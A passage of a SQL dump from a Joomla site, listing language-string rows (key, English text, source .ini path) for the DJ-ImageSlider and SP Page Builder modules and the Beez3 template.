file names (folder) / ordering (component) or randomise the ordering','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4159,'MOD_DJIMAGESLIDER_FILE_NAME_ORDERING','File name/Ordering','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4160,'MOD_DJIMAGESLIDER_RANDOMISE','Randomise','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4161,'MOD_DJIMAGESLIDER_AUTOPLAY','Autoplay','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4162,'MOD_DJIMAGESLIDER_AUTOPLAY_DESC','Choose if slider should automaticly start on page load','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4163,'MOD_DJIMAGESLIDER_SLIDE_EFFECT','Slide effect','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4164,'MOD_DJIMAGESLIDER_SLIDE_EFFECT_DESC','Choose the transition effect.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4165,'MOD_DJIMAGESLIDER_SHOW_PLAY_PAUSE','Show play/pause','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4166,'MOD_DJIMAGESLIDER_SHOW_PLAY_PAUSE_DESC','You can hide or show button for start and stop auto sliding. You can also show button only if mouse cursor is over the slider using \'On Mouse Over\' option.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4167,'MOD_DJIMAGESLIDER_SHOW_NEXT_PREV','Show next/prev','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4168,'MOD_DJIMAGESLIDER_SHOW_NEXT_PREV_DESC','You can hide or show buttons for navigate to next and previous slide. You can also show buttons only if mouse cursor is over the slider using \'On Mouse Over\' option.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4169,'MOD_DJIMAGESLIDER_CUSTOMISE_SLIDE_DESCRIPTION','CUSTOMISE SLIDE DESCRIPTION','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4170,'MOD_DJIMAGESLIDER_DESCRIPTION_WIDTH','Description width','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4171,'MOD_DJIMAGESLIDER_DESCRIPTION_WIDTH_DESC','Description area width in pixels. Leave empty for 100% width.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4172,'MOD_DJIMAGESLIDER_DESCRIPTION_VERTICAL_POSITION','Description vertical position','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4173,'MOD_DJIMAGESLIDER_DESCRIPTION_VERTICAL_POSITION_DESC','Set vertical position of description area in pixels from the bottom border of the image.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4174,'MOD_DJIMAGESLIDER_DESCRIPTION_HORIZONTAL_POSITION','Description horizontal position','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4175,'MOD_DJIMAGESLIDER_DESCRIPTION_HORIZONTAL_POSITION_DESC','Set horizontal position of description area in pixels from the left border of the image.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4176,'MOD_DJIMAGESLIDER_CUSTOMISE_BUTTONS','CUSTOMISE BUTTONS','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4177,'MOD_DJIMAGESLIDER_PREV_BUTTON','Prev Button','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4178,'MOD_DJIMAGESLIDER_PREV_BUTTON_DESC','Type here path from joomla root folder to the prev navigation button image. Leave this field empty for default button image. Example: images/stories/prev.png','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4179,'MOD_DJIMAGESLIDER_NEXT_BUTTON','Next Button','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4180,'MOD_DJIMAGESLIDER_NEXT_BUTTON_DESC','Type here path from joomla root folder to the right navigation arrow image. Leave this field empty for default arrow image. Example: images/stories/next.png','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4181,'MOD_DJIMAGESLIDER_PLAY_BUTTON','Play Button','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4182,'MOD_DJIMAGESLIDER_PLAY_BUTTON_DESC','Type here path from joomla root folder to the play button image. Leave this field empty for default image. Example: images/stories/play.png','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4183,'MOD_DJIMAGESLIDER_PAUSE_BUTTON','Pause Button','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4184,'MOD_DJIMAGESLIDER_PAUSE_BUTTON_DESC','Type here path from joomla root folder to the pause button image. Leave this field empty for default image. Example: images/stories/pause.png','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4185,'MOD_DJIMAGESLIDER_NAV_BAR_VERTICAL_POSITION','Navigation bar vertical position','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4186,'MOD_DJIMAGESLIDER_NAV_BAR_VERTICAL_POSITION_DESC','Set vertical position of navigation bar in pixels from the top of the slider','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4187,'MOD_DJIMAGESLIDER_NAV_BAR_HORIZONTAL_POSITION','Navigation bar horizontal position','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4188,'MOD_DJIMAGESLIDER_NAV_BAR_HORIZONTAL_POSITION_DESC','Set horizontal position (left and right margin) for navigation bar. You can use negative value if you want arrows go outside the slider.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4189,'MOD_DJIMAGESLIDER_SLIDE_EFFECT_OPTIONS','SLIDE EFFECT OPTIONS','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4190,'MOD_DJIMAGESLIDER_SLIDE_EFFECT_TYPE','Slide effect type','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4191,'MOD_DJIMAGESLIDER_SLIDE_EFFECT_TYPE_DESC','Choose effect type or leave \'auto\' to let the system choose.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4192,'MOD_DJIMAGESLIDER_NEXT_SLIDE_DELAY','Next slide delay','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4193,'MOD_DJIMAGESLIDER_NEXT_SLIDE_DELAY_DESC','Set pause time between slides in miliseconds (1000 ms = 1 second). Leave empty to let the system choose.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4194,'MOD_DJIMAGESLIDER_SLIDE_DURATION','Slide transition time','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4195,'MOD_DJIMAGESLIDER_SLIDE_DURATION_DESC','Set slide transition time in miliseconds (1000 ms = 1 second). Leave empty to let the system choose.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4196,'MOD_DJIMAGESLIDER_OPEN_IMAGE_IN_SLIMBOX','Open image in slimbox','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4197,'MOD_DJIMAGESLIDER_CUSTOMISE','Customise Slider','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4198,'MOD_DJIMAGESLIDER_USE_CSS3_TRANSITION','Use CSS3 transition','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4199,'MOD_DJIMAGESLIDER_USE_CSS3_TRANSITION_DESC','Use CSS3 transition instead of javascript transition effect for switching between the slides.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4200,'MOD_DJIMAGESLIDER_CUSTOM_NAVIGATION_STYLE','Indicators style','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4201,'MOD_DJIMAGESLIDER_CUSTOM_NAVIGATION_POINTS','Points','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4202,'MOD_DJIMAGESLIDER_CUSTOM_NAVIGATION_NUMBERS','Numbers','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4203,'MOD_DJIMAGESLIDER_OPEN_IMAGE_IN_LIGHTBOX','Open image in magnific/slimbox popup','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4204,'MOD_DJIMAGESLIDER_THEME','Theme','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4205,'MOD_DJIMAGESLIDER_THEME_DESC','Choose the theme for DJ-ImageSlider. You can create your own theme by copy the existing one and renaming the folder or copy the djimageslider.css file from default theme into /templates/[your_template]/css/ and set theme to \'- override from template -\'.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4206,'MOD_DJIMAGESLIDER_THEME_OVERRIDE','- override from template -','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4207,'MOD_DJIMAGESLIDER_VERTICAL_IMAGE_CENTERING','Vertical image centring','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4208,'MOD_DJIMAGESLIDER_FULL_WIDTH','Full Width Slider','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4209,'MOD_DJIMAGESLIDER_FULL_WIDTH_DESC','Enable this option to stretch slider to the width of the parent container regardless the used slider width. Use this option to make the slider fulfill all available width, the only limit is the width of parent container where the slider is published in.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4210,'MOD_DJIMAGESLIDER_SLIDE_EFFECT_LINK','<a href=\"https://dj-extensions.com/faq/general-faq/fx-transitions\" target=\"_blank\">Click here to learn more about slide effects</a>','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4211,'MOD_DJIMAGESLIDER_KEYBOARD_ACCESS','Keyboard access (WCAG)','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4212,'MOD_DJIMAGESLIDER_KEYBOARD_ACCESS_DESC','Enable keyboard access to meet WCAG recommendations. When this option is disabled keyboard access can be partially supported, but won\'t be optimized.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4213,'MOD_DJIMAGESLIDER_LOOP_ONCE','Loop once','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4214,'MOD_DJIMAGESLIDER_LOOP_ONCE_DESC','When this option is enabled, the autoplay will be paused on the last image.','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4215,'MOD_DJIMAGESLIDER_FILE_NAME_ORDERING_ASC','File name/ordering ascending','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4216,'MOD_DJIMAGESLIDER_FILE_NAME_ORDERING_DESC','File name/ordering descending','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4217,'MOD_DJIMAGESLIDER_DATE_ASC','File/item date ascending','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4218,'MOD_DJIMAGESLIDER_DATE_DESC','File/item date descending','/home/smthsmth/public_html/modules/mod_djimageslider/language/en-GB/en-GB.mod_djimageslider.ini'),(4219,'MOD_SPPAGEBUILDER','SP Page Builder','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4220,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME','Name','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4221,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL','Email','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4222,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT','Subject','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4223,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE','Message','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4224,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND','Send Message','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4225,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_WRONG_CAPTCHA','Wrong answer! Please enter right answer.','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4226,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUCCESS','Email sent successfully!','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4227,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED','Email sent failed.','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4228,'COM_SPPAGEBUILDER_TWEET_FOLLOWERS','Followers','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4229,'COM_SPPAGEBUILDER_TWEET_FOLLOW','Follow','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4230,'COM_SPPAGEBUILDER_SECOND','Second','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4231,'COM_SPPAGEBUILDER_SECONDS','Seconds','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4232,'COM_SPPAGEBUILDER_MINUTE','Minute','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4233,'COM_SPPAGEBUILDER_MINUTES','Minutes','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4234,'COM_SPPAGEBUILDER_HOUR','Hour','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4235,'COM_SPPAGEBUILDER_HOURS','Hours','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4236,'COM_SPPAGEBUILDER_DAY','Day','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4237,'COM_SPPAGEBUILDER_DAYS','Days','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4238,'COM_SPPAGEBUILDER_MONTHS','Months','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4239,'COM_SPPAGEBUILDER_MONTH','Month','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4240,'COM_SPPAGEBUILDER_YEAR','Year','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4241,'COM_SPPAGEBUILDER_YEARS','Years','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4242,'COM_SPPAGEBUILDER_AGO','ago','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4243,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TOTAL_SHARES','Shares','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4244,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_FACEBOOK','Facebook','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4245,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TWITTER','Twitter','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4246,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GOOGLE_PLUS','Google Plus','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4247,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_LINKEDIN','Linkedin','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4248,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_PINTEREST','Pinterest','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4249,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_THUMBLR','Thublr','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4250,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GETPOCKET','Getpocket','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4251,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_REDDIT','Reddit','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4252,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_VK','VK','/home/smthsmth/public_html/modules/mod_sppagebuilder/language/en-GB.mod_sppagebuilder.ini'),(4253,'TPL_BEEZ3_ADDITIONAL_INFORMATION','Additional information','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4254,'TPL_BEEZ3_ALTCLOSE','is closed','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4255,'TPL_BEEZ3_ALTOPEN','is open','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4256,'TPL_BEEZ3_BIGGER','Bigger','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4257,'TPL_BEEZ3_CLICK','select','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4258,'TPL_BEEZ3_CLOSEMENU','Close Menu','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4259,'TPL_BEEZ3_DECREASE_SIZE','Decrease size','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4260,'TPL_BEEZ3_ERROR_JUMP_TO_NAV','Jump to navigation','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4261,'TPL_BEEZ3_FIELD_BOOTSTRAP_DESC','Create a comma separated list of any components for which Bootstrap is needed, for example com_name, com_anothername.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4262,'TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL','Components Requiring<br /> Bootstrap','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4263,'TPL_BEEZ3_FIELD_DESCRIPTION_DESC','Please add your site description here.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4264,'TPL_BEEZ3_FIELD_DESCRIPTION_LABEL','Site Description','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4265,'TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC','Choose a colour for the Background when Custom is selected as the Template Colour. If left blank the Default (#eeeeee) is used.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4266,'TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL','Background Colour','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4267,'TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC','Use the selected header image when Custom is selected as the Template Colour','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4268,'TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL','Header Image','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4269,'TPL_BEEZ3_FIELD_LOGO_DESC','Please choose an image. If you do not want to display a logo, select Clear and leave the field blank.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4270,'TPL_BEEZ3_FIELD_LOGO_LABEL','Logo','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4271,'TPL_BEEZ3_FIELD_NAVPOSITION_DESC','Navigation before or after content.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4272,'TPL_BEEZ3_FIELD_NAVPOSITION_LABEL','Position of Navigation','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4273,'TPL_BEEZ3_FIELD_SITETITLE_DESC','Please add your site title here, it\'s only displayed if you don\'t use a logo.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4274,'TPL_BEEZ3_FIELD_SITETITLE_LABEL','Site Title','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4275,'TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC','Colour of the template.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4276,'TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL','Template colour','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4277,'TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC','Wrapper width with closed additional columns in percent.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4278,'TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL','Wrapper Large (%)','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4279,'TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC','Wrapper width with opened additional columns in percent.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4280,'TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL','Wrapper Small (%)','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4281,'TPL_BEEZ3_FONTSIZE','Font size','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4282,'TPL_BEEZ3_INCREASE_SIZE','Increase size','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4283,'TPL_BEEZ3_JUMP_TO_INFO','Jump to additional information','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4284,'TPL_BEEZ3_JUMP_TO_NAV','Jump to main navigation and login','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4285,'TPL_BEEZ3_NAVIGATION','Navigation','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4286,'TPL_BEEZ3_NAV_VIEW_SEARCH','Nav view search','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4287,'TPL_BEEZ3_NEXTTAB','Next Tab','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4288,'TPL_BEEZ3_OPENMENU','Open Menu','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4289,'TPL_BEEZ3_OPTION_AFTER_CONTENT','after content','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4290,'TPL_BEEZ3_OPTION_BEFORE_CONTENT','before content','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4291,'TPL_BEEZ3_OPTION_IMAGE','Custom','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4292,'TPL_BEEZ3_OPTION_NATURE','Nature','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4293,'TPL_BEEZ3_OPTION_PERSONAL','Personal','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4294,'TPL_BEEZ3_OPTION_RED','Red','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4295,'TPL_BEEZ3_OPTION_TURQ','Turquoise','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4296,'TPL_BEEZ3_POWERED_BY','Powered by','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4297,'TPL_BEEZ3_RESET','Reset','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4298,'TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT','Revert styles to default','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4299,'TPL_BEEZ3_SEARCH','Search','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4300,'TPL_BEEZ3_SKIP_TO_CONTENT','Skip to content','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4301,'TPL_BEEZ3_SKIP_TO_ERROR_CONTENT','Jump to error message and search','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4302,'TPL_BEEZ3_SMALLER','Smaller','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4303,'TPL_BEEZ3_SYSTEM_MESSAGE','Error','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4304,'TPL_BEEZ3_TEXTRIGHTCLOSE','Close info','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4305,'TPL_BEEZ3_TEXTRIGHTOPEN','Open info','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4306,'TPL_BEEZ3_XML_DESCRIPTION','Accessible site template for Joomla! 3.x. Beez3, the HTML5 version.','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4307,'TPL_BEEZ3_YOUR_SITE_DESCRIPTION','Your site description','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.ini'),(4308,'TPL_BEEZ3_POSITION_DEBUG','Debug','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4309,'TPL_BEEZ3_POSITION_POSITION-0','Search','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4310,'TPL_BEEZ3_POSITION_POSITION-10','Footer middle','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4311,'TPL_BEEZ3_POSITION_POSITION-11','Footer bottom','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4312,'TPL_BEEZ3_POSITION_POSITION-12','Middle top','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4313,'TPL_BEEZ3_POSITION_POSITION-13','Unused','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4314,'TPL_BEEZ3_POSITION_POSITION-14','Footer last','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4315,'TPL_BEEZ3_POSITION_POSITION-15','Header','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4316,'TPL_BEEZ3_POSITION_POSITION-1','Top','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4317,'TPL_BEEZ3_POSITION_POSITION-2','Breadcrumbs','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4318,'TPL_BEEZ3_POSITION_POSITION-3','Right bottom','/home/smthsmth/public_html/templates/beez3/language/en-GB/en-GB.tpl_beez3.sys.ini'),(4319,'TPL_BEEZ3_POSITION_POSITION-4','Left 